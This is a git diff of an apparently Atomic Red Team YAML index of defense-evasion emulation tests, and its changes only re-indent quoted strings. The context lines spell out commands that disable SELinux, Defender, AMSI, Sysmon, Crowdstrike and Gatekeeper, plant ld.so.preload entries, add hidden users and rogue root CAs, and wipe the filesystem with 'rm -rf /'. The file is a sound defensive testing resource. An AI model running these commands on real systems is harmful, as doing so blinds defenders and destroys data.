       executor:
         name: sh
         elevation_required: true
@@ -23129,7 +23129,7 @@ defense-evasion:
           grep "# THIS IS A COMMENT" /etc/default/ufw
         cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw
 
-'
+          '
     - name: Tail the UFW firewall log file
       auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27
       description: "Print  the last 10 lines of the Uncomplicated Firewall (UFW) log
@@ -23140,20 +23140,20 @@ defense-evasion:
       dependencies:
       - description: 'Check if /var/log/ufw.log exists.
 
-'
+          '
         prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw
           NOT logging *****\n"; exit 1; fi
 
-'
+          '
         get_prereq_command: 'echo ""
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
         command: 'tail /var/log/ufw.log
 
-'
+          '
         cleanup_command: ''
   T1562.001:
     technique:
@@ -23218,7 +23218,7 @@ defense-evasion:
       auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
       description: 'Disables syslog collection
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -23245,11 +23245,11 @@ defense-evasion:
       dependencies:
       - description: 'Package with rsyslog must be on system
 
-'
+          '
         prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
           1; fi
 
-'
+          '
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
         command: "#{flavor_command}\n"
@@ -23260,7 +23260,7 @@ defense-evasion:
       auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
       description: 'Disable the Cb Response service
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -23278,23 +23278,23 @@ defense-evasion:
       auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
       description: 'Disables SELinux enforcement
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'setenforce 0
 
-'
+          '
         cleanup_command: 'setenforce 1
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Stop Crowdstrike Falcon on Linux
       auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
       description: 'Stop and disable Crowdstrike Falcon on Linux
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -23310,7 +23310,7 @@ defense-evasion:
       auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
       description: 'Disables Carbon Black Response
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -23326,48 +23326,48 @@ defense-evasion:
       auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
       description: 'Disables LittleSnitch
 
-'
+        '
       supported_platforms:
       - macos
       executor:
         command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 
-'
+          '
         cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Disable OpenDNS Umbrella
       auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
       description: 'Disables OpenDNS Umbrella
 
-'
+        '
       supported_platforms:
       - macos
       executor:
         command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 
-'
+          '
         cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Disable macOS Gatekeeper
       auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
       description: 'Disables macOS Gatekeeper
 
-'
+        '
       supported_platforms:
       - macos
       executor:
         command: 'sudo spctl --master-disable
 
-'
+          '
         cleanup_command: 'sudo spctl --master-enable
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Stop and unload Crowdstrike Falcon on macOS
@@ -23375,7 +23375,7 @@ defense-evasion:
       description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
         on macOS
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -23413,40 +23413,40 @@ defense-evasion:
       dependencies:
       - description: 'Sysmon must be downloaded
 
-'
+          '
         prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon
           2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else {
           exit 1 }
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
           Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
           Remove-Item $env:TEMP\Sysmon.zip -Force
       - description: 'sysmon must be Installed
 
-'
+          '
         prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else
           { exit 1 }
 
-'
+          '
         get_prereq_command: |
           if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
           { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
       - description: 'sysmon filter must be loaded
 
-'
+          '
         prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
           } else { exit 1 }
 
-'
+          '
         get_prereq_command: |
           sysmon -u
           sysmon -accepteula -i
       executor:
         command: 'fltmc.exe unload #{sysmon_driver}
 
-'
+          '
         cleanup_command: |
           sysmon -u -i > nul 2>&1
           sysmon -i -accepteula -i > nul 2>&1
@@ -23458,7 +23458,7 @@ defense-evasion:
       auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
       description: 'Uninstall Sysinternals Sysmon for Defense Evasion
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -23471,10 +23471,10 @@ defense-evasion:
       dependencies:
       - description: 'Sysmon executable must be available
 
-'
+          '
         prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
           New-Item -ItemType Directory $parentpath -Force | Out-Null
@@ -23483,20 +23483,20 @@ defense-evasion:
           if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
       - description: 'Sysmon must be installed
 
-'
+          '
         prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: 'cmd /c sysmon -i -accepteula
 
-'
+          '
       executor:
         command: 'sysmon -u
 
-'
+          '
         cleanup_command: 'sysmon -i -accepteula >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: AMSI Bypass - AMSI InitFailed
@@ -23524,11 +23524,11 @@ defense-evasion:
         command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
           -Recurse
 
-'
+          '
         cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
           -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Disable Arbitrary Security Windows Service
@@ -23602,11 +23602,11 @@ defense-evasion:
         command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
           -Name DisableAntiSpyware -Value 1
 
-'
+          '
         cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
           Defender" -Name DisableAntiSpyware -Value 0
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Disable Microsoft Office Security Features
@@ -23646,7 +23646,7 @@ defense-evasion:
         command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
           -All
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Stop and Remove Arbitrary Security Windows Service
@@ -23656,7 +23656,7 @@ defense-evasion:
         The Remove-Service cmdlet removes a Windows service in the registry and in
         the service database.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -23677,7 +23677,7 @@ defense-evasion:
         is located in a folder named with a random guid we need to identify it before
         invoking the uninstaller.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -24316,21 +24316,21 @@ defense-evasion:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-'
+          '
         prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-'
+          '
       executor:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
-'
+          '
         cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Shared Library Injection via LD_PRELOAD
@@ -24355,18 +24355,18 @@ defense-evasion:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-'
+          '
         prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-'
+          '
       executor:
         command: 'LD_PRELOAD=#{path_to_shared_library} ls
 
-'
+          '
         name: bash
   T1055.001:
     technique:
@@ -24466,10 +24466,10 @@ defense-evasion:
       dependencies:
       - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -24943,7 +24943,7 @@ defense-evasion:
       auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
       description: 'Delete a single file from the temporary directory
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -24955,14 +24955,14 @@ defense-evasion:
       executor:
         command: 'rm -f #{file_to_delete}
 
-'
+          '
         name: sh
     - name: Delete an entire folder - Linux/macOS
       auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
       description: 'Recursively delete the temporary directory and all files contained
         within it
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -24974,14 +24974,14 @@ defense-evasion:
       executor:
         command: 'rm -rf #{folder_to_delete}
 
-'
+          '
         name: sh
     - name: Overwrite and delete a file with shred
       auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499'
       description: 'Use the `shred` command to overwrite the temporary file and then
         delete it
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -24992,7 +24992,7 @@ defense-evasion:
       executor:
         command: 'shred -u #{file_to_shred}
 
-'
+          '
         name: sh
     - name: Delete a single file - Windows cmd
       auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
@@ -25012,17 +25012,17 @@ defense-evasion:
       - description: 'The file to delete must exist on disk at specified location
           (#{file_to_delete})
 
-'
+          '
         prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete}
 
-'
+          '
       executor:
         command: 'del /f #{file_to_delete}
 
-'
+          '
         name: command_prompt
     - name: Delete an entire folder - Windows cmd
       auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
@@ -25042,17 +25042,17 @@ defense-evasion:
       - description: 'The file to delete must exist on disk at specified location
           (#{folder_to_delete})
 
-'
+          '
         prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: 'mkdir #{folder_to_delete}
 
-'
+          '
       executor:
         command: 'rmdir /s /q #{folder_to_delete}
 
-'
+          '
         name: command_prompt
     - name: Delete a single file - Windows PowerShell
       auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
@@ -25060,7 +25060,7 @@ defense-evasion:
         Upon execution, no output will be displayed. Use File Explorer to verify the
         file was deleted.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -25074,17 +25074,17 @@ defense-evasion:
       - description: 'The file to delete must exist on disk at specified location
           (#{file_to_delete})
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null
 
-'
+          '
       executor:
         command: 'Remove-Item -path #{file_to_delete}
 
-'
+          '
         name: powershell
     - name: Delete an entire folder - Windows PowerShell
       auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
@@ -25092,7 +25092,7 @@ defense-evasion:
         Upon execution, no output will be displayed. Use File Explorer to verify the
         folder was deleted.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -25106,18 +25106,18 @@ defense-evasion:
       - description: 'The folder to delete must exist on disk at specified location
           (#{folder_to_delete})
 
-'
+          '
         prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
           Out-Null
 
-'
+          '
       executor:
         command: 'Remove-Item -Path #{folder_to_delete} -Recurse
 
-'
+          '
         name: powershell
     - name: Delete Filesystem - Linux
       auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -25125,13 +25125,13 @@ defense-evasion:
         This technique was used by Amnesia IoT malware to avoid analysis. This test
         is dangerous and destructive, do NOT use on production equipment.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
 
-'
+          '
         name: bash
     - name: Delete Prefetch File
       auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -25144,7 +25144,7 @@ defense-evasion:
         command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
           -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Delete TeamViewer Log Files
@@ -25168,18 +25168,18 @@ defense-evasion:
       - description: 'The folder to delete must exist on disk at specified location
           (#{teamviewer_log_file})
 
-'
+          '
         prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null
 
-'
+          '
       executor:
         command: 'Remove-Item #{teamviewer_log_file}
 
-'
+          '
         name: powershell
   T1222:
     technique:
@@ -25324,7 +25324,7 @@ defense-evasion:
       auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
       description: 'Gatekeeper Bypass via command line
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -25335,7 +25335,7 @@ defense-evasion:
       executor:
         command: 'sudo xattr -d com.apple.quarantine #{app_path}
 
-'
+          '
         elevation_required: true
         name: sh
   T1484.001:
@@ -25563,7 +25563,7 @@ defense-evasion:
       auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
       description: 'Creates a hidden file inside a hidden directory
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -25573,20 +25573,20 @@ defense-evasion:
           echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
         cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
 
-'
+          '
         name: sh
     - name: Mac Hidden file
       auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
       description: 'Hide a file on MacOS
 
-'
+        '
       supported_platforms:
       - macos
       executor:
         command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
           40 00 FF FF FF FF 00 00"
 
-'
+          '
         name: sh
     - name: Create Windows System File with Attrib
       auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
@@ -25604,20 +25604,20 @@ defense-evasion:
       dependencies:
       - description: 'The file must exist on disk at specified location (#{file_to_modify})
 
-'
+          '
         prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
 
-'
+          '
       executor:
         command: 'attrib.exe +s #{file_to_modify}
 
-'
+          '
         cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Create Windows Hidden File with Attrib
@@ -25636,27 +25636,27 @@ defense-evasion:
       dependencies:
       - description: 'The file must exist on disk at specified location (#{file_to_modify})
 
-'
+          '
         prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
 
-'
+          '
         get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
 
-'
+          '
       executor:
         command: 'attrib.exe +h #{file_to_modify}
 
-'
+          '
         cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Hidden files
       auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379
       description: 'Requires Apple Dev Tools
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -25667,13 +25667,13 @@ defense-evasion:
       executor:
         command: 'setfile -a V #{filename}
 
-'
+          '
         name: sh
     - name: Hide a Directory
       auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
       description: 'Hide a directory on MacOS
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -25682,22 +25682,22 @@ defense-evasion:
           chflags hidden /var/tmp/T1564.001_mac.txt
         cleanup_command: 'rm /var/tmp/T1564.001_mac.txt
 
-'
+          '
         name: sh
     - name: Show all hidden files
       auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c
       description: 'Show all hidden files on MacOS
 
-'
+        '
       supported_platforms:
       - macos
       executor:
         command: 'defaults write com.apple.finder AppleShowAllFiles YES
 
-'
+          '
         cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
 
-'
+          '
         name: sh
   T1564.002:
     technique:
@@ -25745,7 +25745,7 @@ defense-evasion:
       description: 'Add a hidden user on macOS using Unique ID < 500 (users with that
         ID are hidden by default)
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -25756,17 +25756,17 @@ defense-evasion:
       executor:
         command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
 
-'
+          '
         cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
 
-'
+          '
         elevation_required: true
         name: sh
     - name: Create Hidden User using IsHidden option
       auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
       description: 'Add a hidden user on macOS using IsHidden optoin
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -25777,10 +25777,10 @@ defense-evasion:
       executor:
         command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1
 
-'
+          '
         cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
 
-'
+          '
         elevation_required: true
         name: sh
   T1564.003:
@@ -25862,7 +25862,7 @@ defense-evasion:
       executor:
         command: 'Start-Process #{powershell_command}
 
-'
+          '
         name: powershell
   T1564:
     technique:
@@ -25946,7 +25946,7 @@ defense-evasion:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "Word.Application" | Out-Null
@@ -25956,7 +25956,7 @@ defense-evasion:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-'
+          '
       executor:
         command: |
           $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
@@ -25966,7 +25966,7 @@ defense-evasion:
           Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
         cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Create a Hidden User Called "$"
       auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
@@ -26141,7 +26141,7 @@ defense-evasion:
       auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
       description: 'Disables history collection in shells
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -26307,7 +26307,7 @@ defense-evasion:
       auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
       description: 'Emulates modification of auditd configuration files
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -26342,7 +26342,7 @@ defense-evasion:
       auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
       description: 'Emulates modification of syslog configuration.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -26487,10 +26487,10 @@ defense-evasion:
       executor:
         command: 'fsutil usn deletejournal /D C:
 
-'
+          '
         cleanup_command: 'fsutil usn createjournal m=1000 a=100 c:
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1202:
@@ -26604,7 +26604,7 @@ defense-evasion:
       executor:
         command: 'conhost.exe "#{process}"
 
-'
+          '
         name: command_prompt
   T1553.004:
     technique:
@@ -26704,7 +26704,7 @@ defense-evasion:
       auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
       description: 'Creates a root CA with openssl
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -26733,7 +26733,7 @@ defense-evasion:
       auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
       description: 'Creates a root CA with openssl
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -26749,10 +26749,10 @@ defense-evasion:
       dependencies:
       - description: 'Verify the certificate exists. It generates if not on disk.
 
-'
+          '
         prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: |
           if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
           openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -26766,7 +26766,7 @@ defense-evasion:
       auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
       description: 'Creates a root CA with openssl
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -26782,10 +26782,10 @@ defense-evasion:
       dependencies:
       - description: 'Verify the certificate exists. It generates if not on disk.
 
-'
+          '
         prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: |
           if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
           openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -26793,14 +26793,14 @@ defense-evasion:
         command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain"
           "#{cert_filename}"
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Install root CA on Windows
       auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
       description: 'Creates a root CA with Powershell
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -26812,10 +26812,10 @@ defense-evasion:
       dependencies:
       - description: 'Verify the certificate exists. It generates if not on disk.
 
-'
+          '
         prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 
-'
+          '
         get_prereq_command: |
           $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
           Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -26839,7 +26839,7 @@ defense-evasion:
       auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
       description: 'Creates a root CA with certutil
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -26851,10 +26851,10 @@ defense-evasion:
       dependencies:
       - description: 'Certificate must exist at specified location (#{pfx_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 
-'
+          '
         get_prereq_command: |
           $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
           Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -26862,7 +26862,7 @@ defense-evasion:
       executor:
         command: 'certutil -addstore my #{pfx_path}
 
-'
+          '
         cleanup_command: |
           $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
           Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
@@ -26949,10 +26949,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27017,10 +27017,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27063,7 +27063,7 @@ defense-evasion:
       description: 'Executes the installer assembly class constructor. Upon execution,
         version information will be displayed the .NET framework install utility.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27088,10 +27088,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27134,7 +27134,7 @@ defense-evasion:
       description: 'Executes the Install Method. Upon execution, version information
         will be displayed the .NET framework install utility.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27159,10 +27159,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27205,7 +27205,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method. Upon execution, version information
         will be displayed the .NET framework install utility.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27230,10 +27230,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27277,7 +27277,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method. Upon execution, version information
         will be displayed the .NET framework install utility.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27302,10 +27302,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27348,7 +27348,7 @@ defense-evasion:
       description: 'Executes the Uninstall Method. Upon execution, help information
         will be displayed for InstallUtil.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -27373,10 +27373,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -27430,10 +27430,10 @@ defense-evasion:
       - description: 'InstallUtil test harness script must be installed at specified
           location (#{test_harness})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
